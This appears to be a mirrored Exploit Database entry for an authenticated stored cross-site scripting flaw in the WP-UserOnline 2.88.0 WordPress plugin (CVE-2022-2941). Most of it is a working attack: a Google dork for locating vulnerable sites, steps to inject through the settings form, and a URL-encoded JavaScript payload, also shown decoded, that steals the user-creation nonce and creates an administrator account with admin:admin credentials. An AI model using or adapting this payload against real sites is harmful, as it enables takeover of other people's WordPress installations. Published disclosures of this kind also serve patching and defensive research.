WP-UserOnline 2.88.0 – Stored Cross Site Scripting (XSS) (Authenticated)

• Exploit Database
• 24 阅读

• 作者： Onur Göğebakan
  日期： 2024-06-14
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/52048/

• # Exploit Title: WP-UserOnline 2.88.0 - Stored Cross Site Scripting (XSS) (Authenticated)
  # Google Dork: inurl:/wp-content/plugins/wp-useronline/
  # Date: 2024-06-12
  # Exploit Author: Onur Göğebakan
  # Vendor Homepage: https://github.com/lesterchan/wp-useronline
  # Software Link: https://downloads.wordpress.org/plugin/wp-useronline.2.88.0.zip
  # Category: Web Application
  # Version: 2.88.0
  # Tested on: WordPress 6.5.4 - Windows 10
  # CVE : CVE-2022-2941
  
  # Explanation:
  A new administrator user can be added to WordPress using a stored XSS vulnerability.
  
  
  # Exploit:
  1. Visit http://poc.test/wp-admin/options-general.php?page=useronline-settings
  2. Click Save and intercept the request.
  3. Change `naming%5Bbots%5D` parameter value with belowed payload
  ```
  %3Cscript%3E+function+handleResponse%28%29+%7B+var+nonce+%3D+this.responseText.match%28%2Fname%3D%22_wpnonce_create-user%22+value%3D%22%28%5Cw%2B%29%22%2F%29%5B1%5D%3B+var+changeReq+%3D+new+XMLHttpRequest%28%29%3B+changeReq.open%28%27POST%27%2C%27%2Fwp-admin%2Fuser-new.php%27%2Ctrue%29%3B+changeReq.setRequestHeader%28%27Content-Type%27%2C%27application%2Fx-www-form-urlencoded%27%29%3B+var+params+%3D+%27action%3Dcreateuser%26_wpnonce_create-user%3D%27%2Bnonce%2B%27%26_wp_http_referer%3D%252Fwp-admin%252Fuser-new.php%27%2B%27%26user_login%3Dadmin%26email%3Dadmin%2540mail.com%26first_name%3D%26last_name%3D%26url%3D%26pass1%3Dadmin%26pass2%3Dadmin%26pw_weak%3Don%26role%3Dadministrator%26createuser%3DAdd%2BNew%2BUser%27%3B+changeReq.send%28params%29%3B+%7D+var+req+%3D+new+XMLHttpRequest%28%29%3B+req.onload+%3D+handleResponse%3B+req.open%28%27GET%27%2C+%27%2Fwp-admin%2Fuser-new.php%27%2C+true%29%3B+req.send%28%29%3B+%3C%2Fscript%3E
  ```
  4. Payload executed when user visited http://poc.test/wp-admin/index.php?page=useronline
  5. Administrator user added with admin:admin credentials.
  
  
  # Decoded payload
  ```
  function handleResponse() {
  var nonce = this.responseText.match(/name="_wpnonce_create-user" value="(\w+)"/)[1];
  var changeReq = new XMLHttpRequest();
  changeReq.open('POST', '/wp-admin/user-new.php', true);
  changeReq.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
  var params = 'action=createuser&_wpnonce_create-user=' + nonce +
  '&_wp_http_referer=%2Fwp-admin%2Fuser-new.php' +
  '&user_login=admin&email=admin%40mail.com&first_name=&last_name=&url=&pass1=admin&pass2=admin&pw_weak=on&role=administrator&createuser=Add+New+User';
  changeReq.send(params);
  }
  
  var req = new XMLHttpRequest();
  req.onload = handleResponse;
  req.open('GET', '/wp-admin/user-new.php', true);
  req.send();
  ```